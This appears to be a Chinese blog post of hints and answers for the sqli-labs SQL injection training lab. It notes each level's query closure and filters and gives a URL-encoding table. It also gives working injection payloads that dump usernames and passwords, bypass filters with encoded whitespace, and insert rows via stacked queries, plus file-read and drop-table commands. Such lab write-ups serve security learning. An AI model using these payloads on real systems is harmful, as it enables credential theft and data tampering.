sqli-labs提示和答案(含详细教程)

最新推荐文章于 2025-05-11 15:48:25 发布
最新推荐文章于 2025-05-11 15:48:25 发布
阅读量1.8k 收藏 6
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 网络安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/superprintf/article/details/108861308
本文详细介绍了一个名为sqli-labs的平台上的SQL注入挑战,涵盖GET和POST注入、盲注及多种过滤条件下的注入技巧,并提供了特定关卡的解决示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.参考资料部分

具体sqli-labs内容参考
链接1
或者更加全面的
注入天书pdf

2.总结部分

声明:页面显示的图片不总结

第1关到10关为GET注入

前四关登录成功显示用户名,失败报错正常
第1关id=‘1’
第2关id=1
第3关id=(‘1’)
第4关id=(“1”)
第5关和6关登录显示You are in…,失败报错正常
第5关id=‘1’
第6关id=“1”
第7-10关盲注
第7关id=((‘1’))
第8关id=‘1’
第9关id=‘1’
第10关id=“1”

第11关到16关为POST注入

第11关和12关登录成功显示用户名密码,失败报错正常
第11关username=‘admin’
第12关username=(‘admin’)
第13关和14关登录成功不显示,失败报错正常
第13关username=(‘admin’)
第14关username=“admin”
第15关16关盲注
第15关username=‘admin’
第16关username=(‘admin’)

17-22关的过滤

输入字符长度超过15的部分截断
字符串中\x00,\n,\r,\,',",\x1a被转义
纯数字的话被强制转换成整形

第17关username被过滤password=‘1’
第18,19,20,21关username和password都被过滤了
第18关,在http头useragent处注入,前提是成功登录
第19关,在http头Referer处注入,前提是登录成功
第20关,uname='cookie’注入
第21关,uname=(‘cookie’)加密注入
第22关,uname="cookie"加密注入

23关的过滤

-- 和 # 这两个注释符号

第23关id=‘admin’用闭合注入’ or ‘’=’

24关的过滤

\,",'

第24关二次注入

第25/25a关的过滤

and 和 or

第25关id=‘1’
第25a关登录失败不报错
第25a关id=1

第26/26a关的过滤

and,or,--,#,空格、制表符、换页符,/*,//

第26关id=‘1’
第26a关id=(‘1’)

第27关的过滤

--,/*,空格,#,大小写没过滤完全完全的select,union

第27关id=‘1’
第27a关没有报错
第27a关id=“1”

第28关的过滤

--,/*,/,空格,#,大小写完全过滤的union+\s+select

第28关id=(‘1’)
第28a关id=(‘1’) 只过滤union+\s+select组合

第29/30/31关

?id=被WAF过滤的部分&id=payload

第29关id=‘1’
第30关id=“1”
第31关id=(“1”)

第32-37关的过滤

',“,\

思路:宽字节注入

第38-45关

思路:堆叠注入(使用mysqli_multi_query导致的)
mysql基础命令

create table test select * from users;
drop table test;
select load_file('/Users/xjj/Desktop/eval');
insert into users(id,username,password) values('100','new','new');
update test set name='test' where id=3;

第38关id=‘1’
第39关id=1
第40关id=(‘1’)
第41关id=1

第42-45关:
login_user过滤 " / '
login_password='1'

第43关login_password=(‘1’)
第44关login_password=‘1’
第45关login_password=(‘1’)

第46-53关

思路:

order by和limit的注入
order by rand(true)随机排序
order by rand(false)与true不同
rand(),时间盲注,procedure analyse注入
into outfile "/Users/xjj/Desktop/new"

第46关order by $id
第47关order by ‘$id’
第48/49关盲注
第48关order by $id
第49关order by ‘$id’
第50/51关在46关基础上增加堆叠注入
第50关order by $id
第51关order by ‘$id’
第52/53关盲注
第52关order by $id
第53关order by ‘$id’

第54-65关

第54-57关和第1-4关一样但是讲究效率
第54关id=‘1’
第55关id=(1)
第56关id=(‘1’)
第57关id=“1”

第58-61关

union注入没有回显
第58关id=‘1’
第59关id=1
第60关id=(“1”)
第61关id=((‘1’))

第62-65关

盲注,用脚本

常用urlencode

! - %21
" - %22
# - %23
$ - %24
% - %25
& - %26
’ - %27
( - %28
) - %29
* - %2A
+ - %2B
, - %2C
- - %2D
. - %2E
/ - %2F
: - %3A
; - %3B
< - %3C
= - %3D
> - %3E
? - %3F
@ - %40
[ - %5B
\ - %5C
] - %5D
| - %7C
~ 0x7e
: 0x3a
%09 TAB 键(水平)
%0a 新建一行
%0c 新的一页
%0d return 功能
%0b TAB 键(垂直)
%a0 空格

部分关卡的答案

25
?id=’ union select 1,(SELECT GROUP_CONCAT(username,passwoorrd SEPARATOORR 0x3c62723e) FROM users),3 anandd ‘1’=‘1
26关暂时没找到绕过\s正则的方法
27
?id=’%0bunIOn%0bseLEct%0b1,(SEleCT%0bGROUP_CONCAT(username,password%0bSEPARATOR%0b0x3c62723e)%0bFROM%0busers),3%0band%0b’1’=‘1
28
?id=’)%0bunion%0bunion%0bselectselect%0b1,(SELECT%0bGROUP_CONCAT(username,password%0bSEPARATOR%0b0x3c62723e)%0bFROM%0busers),3%0band%0b(‘1
29
id=2&id=’ union select 1,(SELECT GROUP_CONCAT(username,password SEPARATOR 0x3c62723e) FROM users),3 and ‘1’=‘1
32
?id=-1%df%27%20union%20select%201,user(),2–+
34:burpsuite
uname=%df%27%0bunion%0bselect%0b1,(SELECT%0bGROUP_CONCAT(username,password%0bSEPARATOR%0b0x3c62723e)%0bFROM%0busers)–+#&passwd=1&submit=Submit
35
?id=-1%20union%20select%201,2,3;–+
36
?id=-1%df%27union%20select%201,2,3;±-+#
37:burpsuite
uname=%df’+union+select+1,2;±-+#&passwd=1&submit=Submit
42burpsuite
login_user=admin&login_password=’+or+1=1;insert+into+users(username,password)+values(0x61,0x62);±-+#&mysubmit=Login

sqli-labs 1-65 详细分析
qq_43009954的博客
09-04 2100
这是sqli-labs靶场的通关讲解,希望能帮到你
SQLi-labs-Master(1-22)新手通关宝典
Myosotis_LL的博客
05-18 3137
欢迎来到《SQLi-labs-Master新手通关宝典》,本宝典专为网络安全新手编写,旨在引导他们深入了解SQL注入(SQLi)这一严重的安全漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景中实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安全爱好者,掌握SQL注入技术都将对你大有裨益。
sqli-labs 答案
q1415500189的博客
01-13 318
sqli-labs答案记录
SQL注入之sqli靶场-less-1
最新发布
m0_61764257的博客
05-11 623
1、判断注入类型是字符型还是数字型。说明存在字符型sql注入。
sql-lab题解
qq_64584221的博客
04-08 533
zhiLess-1–基于单引号的字符型注入 初始界面: 上面提示: Please input the ID as parameter with numeric value 意思是我们应该输入一个ID信息 我们给他一个id的传参 ?id=1 在id的之后面加 ’ 可判断是否有漏洞 可以看到数据库报错了,最重要的就是能够看懂数据库的错误信息,从错误信息中我们可以知道是单引号的匹配出了问题,也就是说我们添加的单引号成功被数据库解析,那么我们就可以通过闭合这个id这个参数,然后插入自己...
[sqli-labs]Less1~22答案
MercyLin的博客
10-03 1120
Less-1 ?id=1' order by 3 #正常 ?id=1' order by 4 #Unknown column '4' in 'order clause' ?id=666' union select 1,2,(select group_concat(schema_name) from information_schema.schemata) --+ # information_sch...
sqli-labs第一关:有回显位的提示信息注入
m0_51395584的博客
02-14 689
sqli-labs第一关:有回显位的提示信息注入 (一到四关的注入方式类似,只是SQL语句的闭合方式不同) 第一步:直接输入网址: 127.0.0.1/sqli-labs-master/Less-1/ 第二步:设置id=1,确定是否与数据库有交互 127.0.0.1/sqli-labs-master/Less-1/?id=1 第三步:利用 order by 判断当前使用的表有多少个字段,当后面的数字超出当前表的字段后,页面会报错,只有当小于或等于当前表的字段数时,页面才会正常显示 http:
sqli-labs靶场练习笔记
11-09
- **SQLi-Labs介绍**:SQLi-Labs是一款专为学习实践SQL注入技术而设计的靶场环境。它包了多个关卡,每个关卡都模拟了一个具有特定SQL注入漏洞的应用场景。 - **学习价值**:通过解决这些关卡中的问题,学习者...
sqli-labs.rar
12-22
sqli-labs是一个专门设计用于学习练习SQL注入技术的平台,特别适合初学者了解提升SQL注入防御技能。 首先,要搭建sqli-labs,你需要准备以下工具: 1. PHPstudy:一个集成的Web服务器环境,包括Apache、Nginx、...
sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 9157
下面选取几个具有代表性的关卡,演示几种 SQL 注入漏洞利用方法。
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未...
Sqli-labs第一题详解
未完成的歌~的博客
06-10 2128
less1: 根据题目提示为单引号注入,先测试一下 果然报错了,说明我们添加的单引号被数据库成功解析,那我们就可以通过闭合id这个参数 ,然后构造自己的sql语句进行攻击。一般可以使用联合表的方式来提取自己感兴趣的信息(union),但是使用union语句有个前提就是union 后面的语句必须与前面的语句字段数以及类型必须一直,否则数据库会报错。 ...
Sqli-labs学习第一题
Recar的博客
12-06 1888
很多东西了解一下,然后去用,总会遇到问题,一定不能浅尝辄止,要深入学习下,不能说说,要及时复习,要经常用才不会忘。 一直用 sqlmap,很少手工注入,但是很多时候不是别人写的工具就能解决的,要自己的工具适应不同的场景,编写自己的工具,那么首先要手工流程很熟悉才可以。 决定实践一遍 sqli-lab,还有各大平台的CTF都来一遍。 实践是检验真理的唯一标准http://localhost:90
sqli-labs解题大法1~10
weixin_43733035的博客
01-18 2405
有时在URL注入时,#不能起到注释作用,这时可以用–+来进行注释 sqli-labs/Less-1: 首先,输入/?id=1,发现页面正常。输入/?id=1’页面错误,在’后面加上–+注释之后页面正常,说明sql语句为id=’$id’,现在可以利用单引号闭合与–+注释来进行注入。 利用order by 进行排序来获得字段数,发现/?id=1’ order by 3–+页面正常,/?id=1’ or...
sqli-labs解题大法21~28a
weixin_43733035的博客
01-23 666
Less-21: 第21关,根据前面18关之后的经验,我决定先登录一下试试,然后… 瞬间爆炸了有木有,一堆英文完全看不懂啥意思,不过幸好有百度翻译, emmmm,好像没什么用,该没看懂还是没看懂,不过看到有user-agenthttp,就决定先用' and union select 1,2,3#试一下,发现语句会直接输出,并没有注入。 然而,当我在cookie之中写payload时页面出现了...
sqli-labs解题大法11~17
weixin_43733035的博客
01-20 916
Less-11: 首先,进去页面之后发现是这样的 随便输入了一个之后发现报错 可以看出来这是用post方法传递的,我试了几次之后发现由单引号闭合,于是用命令admin’ or 1=1#,页面变化 可以看出来有两个显示位,用1=2令页面错误,使用admin’ or 1=2 order by 2#排序页面正常,admin’ or 1=2 order by 3#页面返回错误,所以有两个字段。接下来就可...
详细Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 4万+
详细Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
Sqli-Labs靶场(17--20)题解析
weixin_46099095的博客
03-14 4236
Less-17:POST - Update Query - Error Based - String(POST - 更新查询 - 基于错误 - 字符串) 这里无论我们在User Name栏输入什么除了正确的用户名admin,他都会报错,难道这题就没有注入点啦? 来,我们先看一下源码 左边是Less-16的源码,右边是Less-17的源码,看不懂每关系,我也看不懂,但是知道uname多了一个东
sqli-labs通关详解
m0_52051132的博客
10-15 7346
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” --current-db 爆破表单。sqlmap.py -u ip --data=“uname=admin&passwd=admin--batch -D security --tables 最后脱库。条件正确有回显,条件错误没有回显,布尔盲注?py -r 文件位置 -p 扫描位置 --batch -D security -T users --dump //脱库。
sqli-labs-master靶场安装教程
03-23
<think>好的,我现在需要帮助用户找到关于sqli-labs-master靶场的安装教程。用户的问题中提到他们需要配置指南实验环境设置。首先,我应该回顾一下之前提供的引用内容,看看是否有相关的安装步骤。 根据引用[1],用户需要修改db-creds.inc文件中的数据库凭据,这说明安装过程中涉及到配置数据库连接。引用[2]提到启动Web服务器后访问本地链接,这提示需要配置Web服务器如Apache,并且将sqli-labs-master放置在服务器目录下。引用[3]展示了SQL注入的示例,但可能对安装帮助不大。 接下来,我需要整理出一个步骤清晰的安装流程。首先确保系统环境满足要求,比如安装PHP、MySQLApache。然后下载并解压sqli-labs-master到Web服务器的根目录。接着配置数据库,创建用户数据库,并修改db-creds.inc文件中的用户名密码。最后通过浏览器访问安装页面并初始化数据库。 可能用户遇到的问题包括数据库连接失败或文件权限问题,所以需要在注意事项中提到检查凭据文件权限。此外,常见问题如页面无法访问可能涉及服务器配置,需要确保Apache运行正常,文件位置正确。 用户可能还需要测试环境是否配置成功,比如访问首页查看是否有界面,或者进行简单的注入测试。因此,在回答中应该包这些验证步骤,并提醒用户参考提供的引用链接获取更多使用细节。 最后,生成的相关问题应该围绕安装过程中的潜在问题、环境配置以及基本使用方法,帮助用户进一步解决可能遇到的困难。</think>### sqli-labs-master 靶场安装教程 #### 一、环境准备 1. **安装 Web 服务器** 推荐使用 $Apache$ 或 $Nginx$,需支持 PHP(版本 ≥5.4) MySQL/MariaDB。 **示例命令(Ubuntu)**: ```bash sudo apt install apache2 php mysql-server php-mysql ``` 2. **下载 sqli-labs-master** 从 GitHub 下载源码并解压到 Web 根目录(如 `/var/www/html/`): ```bash wget https://github.com/Audi-1/sqli-labs/archive/refs/heads/master.zip unzip master.zip -d /var/www/html/ ``` --- #### 二、数据库配置 1. **创建数据库与用户** ```sql CREATE DATABASE sqli_labs; CREATE USER 'sqlilab'@'localhost' IDENTIFIED BY 'password'; GRANT ALL PRIVILEGES ON sqli_labs.* TO 'sqlilab'@'localhost'; FLUSH PRIVILEGES; ``` 2. **修改数据库凭据** 打开文件 `sqli-labs-master/sql-connections/db-creds.inc`,更新以下参数[^1]: ```php <?php $host = 'localhost'; $dbuser = 'sqlilab'; $dbpass = 'password'; $dbname = 'sqli_labs'; ?> ``` --- #### 三、初始化靶场 1. **访问安装页面** 浏览器输入 `http://localhost/sqli-labs-master`,点击 **Setup/reset Database for labs** 初始化数据库[^2]。 2. **验证安装** 若页面显示 *Congratulations!*,则表示环境配置成功。 --- #### 四、注意事项 - 若遇到数据库连接错误,检查 `db-creds.inc` 文件权限与内容[^1]。 - 确保 PHP 的 `mysqli` 扩展已启用。 - 文件路径需与 Web 服务器配置匹配(如 Apache 的 `DocumentRoot`)。 --- #### 常见问题 1. **页面无法访问** 检查 Apache 是否运行,且 `sqli-labs-master` 文件夹位于 Web 根目录。 2. **初始化失败** 确认 MySQL 服务已启动,且用户权限正确[^1]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值